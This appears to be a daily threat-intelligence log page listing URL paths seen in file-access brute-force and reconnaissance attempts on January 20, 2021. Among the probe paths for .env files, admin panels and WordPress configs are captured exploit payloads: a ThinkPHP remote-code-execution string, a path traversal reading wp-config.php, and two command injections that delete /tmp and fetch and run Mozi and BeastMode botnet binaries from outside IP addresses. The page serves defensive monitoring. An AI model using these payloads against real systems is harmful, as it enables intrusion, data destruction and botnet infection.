File Access Bruteforce Attempts for 2021-01-20
Share on:
Jan 20, 2021
Reconnaissance
Last Updated: 21:01 GMT+8
- %20phishingdomains
- .env
- .git/config
- 101.39.232.12
- 72.21.91.29/
- CVE-2008-1054/
- CVE-2008-4801/
- actuator/health
- admin/.env
- api/.env
- blog/.env
- c/version.js
- catalogsearch/result/?cat=3&q=Charity
- client_area/
- clientaccesspolicy.xml
- config/getuser?index=0
- console/
- favicon.ico
- hudson
- index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP21
- jenkins/login
- laravel/.env
- login
- manager/html
- manager/html/
- owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
- phishingdomains-2020-11-16/
- phpmyadmin/
- port10005-2020-11-21/
- public/.env
- shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws
- shell?cd+/tmp;rm+-rf+*;wget+http://84.232.53.219:60288/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
- shop/.env
- sites/.env
- solr/admin/info/system?wt=json
- stalker_portal/c/
- stalker_portal/c/version.js
- streaming/clients_live.php
- system/.env
- system_api.php
- test/.env
- vendor/.env
- vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- wp-admin/config.bak.php
- wp-content/config.bak.php
- wp-content/plugins/apikey/apikey.php
- wp-content/plugins/apikey/cursed.php
- wp-content/plugins/downloads-manager/img/unlock.gif
- wp-content/plugins/ioptimization/IOptimize.php?rchk
- wp-content/plugins/wp-file-manager/readme.txt
- wp-includes/config.bak.php
- wp-includes/css/css.php
- wp-includes/fonts/css.php
- wp-login.php